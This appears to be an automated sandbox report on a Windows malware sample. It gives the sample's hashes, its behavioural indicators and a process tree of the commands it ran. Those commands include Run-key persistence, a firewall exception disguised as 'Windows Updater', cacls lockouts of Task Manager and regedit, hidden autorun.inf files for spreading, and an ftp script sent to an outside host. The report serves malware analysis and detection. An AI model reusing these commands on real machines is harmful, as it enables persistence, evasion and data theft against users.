Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-01-2024 10:23
Static task
static1
Behavioral task
behavioral1
Sample
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
Resource
win10v2004-20231215-en
General
-
Target
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
-
Size
68KB
-
MD5
71fb31da3cbf7262ee9ee1ed4b04a4c6
-
SHA1
4c5e26eb2962f2b41fe4bd36800f6b3f4e232803
-
SHA256
4648b2e57b32d4c0cb8a818996493bde37b7ef24dd266b6e8602112ee7865d6c
-
SHA512
d4ee55a40fda8df91b0155009337635125d47bc6414883e1296aa13635750413858c209c5904047645a4302880ec8cbafa28220de4f8dbeac51d6397bfea3e52
-
SSDEEP
1536:F9wvQUreUbyzsB+2zeNOVffLoSkqeRiq8b:tA/yzn2ze8VfcfJMq8b
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\svcsrss.exe = "C:\\Windows\\system32\\svcsrss.exe:*:Enabled:Windows Updater" reg.exe -
Sets file to hidden 1 TTPs 39 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2612 attrib.exe 2104 attrib.exe 532 attrib.exe 2224 attrib.exe 2864 attrib.exe 1516 attrib.exe 1664 attrib.exe 2912 attrib.exe 1812 attrib.exe 1096 attrib.exe 2168 attrib.exe 2088 attrib.exe 2612 attrib.exe 1864 attrib.exe 980 attrib.exe 1716 attrib.exe 2480 attrib.exe 2360 attrib.exe 588 attrib.exe 2952 attrib.exe 764 attrib.exe 2596 attrib.exe 1684 attrib.exe 1072 attrib.exe 1752 attrib.exe 2180 attrib.exe 2264 attrib.exe 2652 attrib.exe 2056 attrib.exe 2896 attrib.exe 2456 attrib.exe 1480 attrib.exe 1364 attrib.exe 1064 attrib.exe 1596 attrib.exe 2632 attrib.exe 2680 attrib.exe 1740 attrib.exe 2168 attrib.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe -
Drops autorun.inf file 1 TTPs 36 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf cmd.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf cmd.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf cmd.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\svcsrss.exe cmd.exe File opened for modification C:\Windows\SysWOW64\svcsrss.exe attrib.exe File opened for modification C:\Windows\SysWOW64\regedit cmd.exe File opened for modification C:\Windows\SysWOW64\config\VTILVGXH.LOG cmd.exe File opened for modification C:\Windows\SysWOW64\config\firmware.LOG cmd.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2636 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process 2292 taskkill.exe 2700 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 34 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 74003100000000008f579b7b1100557365727300600008000400efbeee3a851a8f579b7b2a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 52003100000000008f579b7b122041707044617461003c0008000400efbe8f579b7b8f579b7b2a000000e90100000000020000000000000000000000000000004100700070004400610074006100000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a003100000000003858ee52102054656d700000360008000400efbe8f579b7b3858ee522a000000fd010000000002000000000000000000000000000000540065006d007000000014000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c003100000000008f577081100041646d696e00380008000400efbe8f579b7b8f5770812a0000002e000000000004000000000000000000000000000000410064006d0069006e00000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c003100000000008f57927d10204c6f63616c00380008000400efbe8f579b7b8f57927d2a000000fc0100000000020000000000000000000000000000004c006f00630061006c00000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 2948 PING.EXE 3044 PING.EXE 1956 PING.EXE 1656 PING.EXE 1036 PING.EXE 904 PING.EXE 2804 PING.EXE 1948 PING.EXE 2180 PING.EXE 2172 PING.EXE 628 PING.EXE 2236 PING.EXE 2380 PING.EXE 1652 PING.EXE 2508 PING.EXE 2956 PING.EXE 664 PING.EXE 1544 PING.EXE 2892 PING.EXE 1768 PING.EXE 2764 PING.EXE 2268 PING.EXE 2532 PING.EXE 2472 PING.EXE 1864 PING.EXE 576 PING.EXE 2988 PING.EXE 1124 PING.EXE 3068 PING.EXE 2388 PING.EXE 2072 PING.EXE 1052 PING.EXE 1648 PING.EXE 312 PING.EXE 2628 PING.EXE 1752 PING.EXE 2500 PING.EXE 1616 PING.EXE 1964 PING.EXE 364 PING.EXE 2280 PING.EXE 2080 PING.EXE 2056 PING.EXE 2164 PING.EXE 1776 PING.EXE 1944 PING.EXE 2584 PING.EXE 2976 PING.EXE 2500 PING.EXE 2604 PING.EXE 1556 PING.EXE 904 PING.EXE 1720 PING.EXE 1752 PING.EXE 268 PING.EXE 2064 PING.EXE 1924 PING.EXE 1968 PING.EXE 1208 PING.EXE 2364 PING.EXE 904 PING.EXE 2140 PING.EXE 2368 PING.EXE 2104 PING.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2292 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2384 wrote to memory of 2092 2384 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 28 PID 2384 wrote to memory of 2092 2384 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 28 PID 2384 wrote to memory of 2092 2384 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 28 PID 2384 wrote to memory of 2092 2384 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 28 PID 2092 wrote to memory of 2676 2092 cmd.exe 30 PID 2092 wrote to memory of 2676 2092 cmd.exe 30 PID 2092 wrote to memory of 2676 2092 cmd.exe 30 PID 2092 wrote to memory of 2676 2092 cmd.exe 30 PID 2092 wrote to memory of 2292 2092 cmd.exe 31 PID 2092 wrote to memory of 2292 2092 cmd.exe 31 PID 2092 wrote to memory of 2292 2092 cmd.exe 31 PID 2092 wrote to memory of 2292 2092 cmd.exe 31 PID 2092 wrote to memory of 2700 2092 cmd.exe 34 PID 2092 wrote to memory of 2700 2092 cmd.exe 34 PID 2092 wrote to memory of 2700 2092 cmd.exe 34 PID 2092 wrote to memory of 2700 2092 cmd.exe 34 PID 2092 wrote to memory of 2632 2092 cmd.exe 35 PID 2092 wrote to memory of 2632 2092 cmd.exe 35 PID 2092 wrote to memory of 2632 2092 cmd.exe 35 PID 2092 wrote to memory of 2632 2092 cmd.exe 35 PID 2092 wrote to memory of 2696 2092 cmd.exe 36 PID 2092 wrote to memory of 2696 2092 cmd.exe 36 PID 2092 wrote to memory of 2696 2092 cmd.exe 36 PID 2092 wrote to memory of 2696 2092 cmd.exe 36 PID 2092 wrote to memory of 2588 2092 cmd.exe 37 PID 2092 wrote to memory of 2588 2092 cmd.exe 37 PID 2092 wrote to memory of 2588 2092 cmd.exe 37 PID 2092 wrote to memory of 2588 2092 cmd.exe 37 PID 2092 wrote to memory of 2600 2092 cmd.exe 38 PID 2092 wrote to memory of 2600 2092 cmd.exe 38 PID 2092 wrote to memory of 2600 2092 cmd.exe 38 PID 2092 wrote to memory of 2600 2092 cmd.exe 38 PID 2092 wrote to memory of 2636 2092 cmd.exe 39 PID 2092 wrote to memory of 2636 2092 cmd.exe 39 PID 2092 wrote to memory of 2636 2092 cmd.exe 39 PID 2092 wrote to memory of 2636 2092 cmd.exe 39 PID 2092 wrote to memory of 2704 2092 cmd.exe 40 PID 2092 wrote to memory of 2704 2092 cmd.exe 40 PID 2092 wrote to memory of 2704 2092 cmd.exe 40 PID 2092 wrote to memory of 2704 2092 cmd.exe 40 PID 2092 wrote to memory of 2084 2092 cmd.exe 41 PID 2092 wrote to memory of 2084 2092 cmd.exe 41 PID 2092 wrote to memory of 2084 2092 cmd.exe 41 PID 2092 wrote to memory of 2084 2092 cmd.exe 41 PID 2092 wrote to memory of 2528 2092 cmd.exe 42 PID 2092 wrote to memory of 2528 2092 cmd.exe 42 PID 2092 wrote to memory of 2528 2092 cmd.exe 42 PID 2092 wrote to memory of 2528 2092 cmd.exe 42 PID 2092 wrote to memory of 2896 2092 cmd.exe 43 PID 2092 wrote to memory of 2896 2092 cmd.exe 43 PID 2092 wrote to memory of 2896 2092 cmd.exe 43 PID 2092 wrote to memory of 2896 2092 cmd.exe 43 PID 2092 wrote to memory of 2912 2092 cmd.exe 44 PID 2092 wrote to memory of 2912 2092 cmd.exe 44 PID 2092 wrote to memory of 2912 2092 cmd.exe 44 PID 2092 wrote to memory of 2912 2092 cmd.exe 44 PID 2092 wrote to memory of 2948 2092 cmd.exe 45 PID 2092 wrote to memory of 2948 2092 cmd.exe 45 PID 2092 wrote to memory of 2948 2092 cmd.exe 45 PID 2092 wrote to memory of 2948 2092 cmd.exe 45 PID 2092 wrote to memory of 2964 2092 cmd.exe 46 PID 2092 wrote to memory of 2964 2092 cmd.exe 46 PID 2092 wrote to memory of 2964 2092 cmd.exe 46 PID 2092 wrote to memory of 2964 2092 cmd.exe 46 -
Views/modifies file attributes 1 TTPs 57 IoCs
pid Process 1364 attrib.exe 2864 attrib.exe 1684 attrib.exe 1812 attrib.exe 2652 attrib.exe 2224 attrib.exe 1072 attrib.exe 2680 attrib.exe 2016 attrib.exe 2956 attrib.exe 2136 attrib.exe 588 attrib.exe 2952 attrib.exe 2168 attrib.exe 2288 attrib.exe 2612 attrib.exe 2304 attrib.exe 2300 attrib.exe 2168 attrib.exe 2244 attrib.exe 1716 attrib.exe 436 attrib.exe 980 attrib.exe 2160 attrib.exe 2104 attrib.exe 1596 attrib.exe 2600 attrib.exe 1064 attrib.exe 2596 attrib.exe 1740 attrib.exe 696 attrib.exe 2056 attrib.exe 2896 attrib.exe 1096 attrib.exe 2360 attrib.exe 1480 attrib.exe 2480 attrib.exe 1664 attrib.exe 2456 attrib.exe 2264 attrib.exe 532 attrib.exe 1752 attrib.exe 2088 attrib.exe 1536 attrib.exe 1756 attrib.exe 1644 attrib.exe 2184 attrib.exe 2612 attrib.exe 1864 attrib.exe 1516 attrib.exe 2996 attrib.exe 2632 attrib.exe 2912 attrib.exe 1972 attrib.exe 320 attrib.exe 2180 attrib.exe 764 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~39F4.bat "C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"2⤵
- Drops autorun.inf file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\explorer.exeC:\Windows\explorer.exe "C:\Users\Admin\AppData\Local\Temp"3⤵PID:2676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im * /fi "WINDOWTITLE eq svcsrss" /f /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ninja.exe /f /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Windows\system32\svcsrss.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:2632
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\taskmgr.exe /e /d todos3⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\Windows\system32\svcsrss.exe /t REG_SZ /d "C:\Windows\system32\svcsrss.exe:*:Enabled:Windows Updater" /f3⤵
- Modifies firewall policy service
PID:2588
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\regedit" /e /c /d Todos3⤵PID:2600
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig3⤵
- Gathers network information
PID:2636
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /e /p Todos:f3⤵PID:2704
-
-
C:\Windows\SysWOW64\ftp.exeftp -s:C:\Windows\system32\config\firmware.LOG ftp.xpg.com.br3⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2528
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2896
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2912
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2964
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Views/modifies file attributes
PID:2304
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2680
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\svcsrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1752
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2236
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2500
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1524
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Views/modifies file attributes
PID:1972
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1812
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\svcsrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:588
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:664
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2772
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2840
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:576
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1684
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1496
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1352
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2036
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2000
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2988
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2380
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2192
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1796
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2052
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:904
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2388
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1124
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1924
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2472
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2256
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2104
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1760
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:364
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1716
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:320
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2180
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2248
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1724
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:980
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2184
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1572
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2456
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:684
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2692
-
-
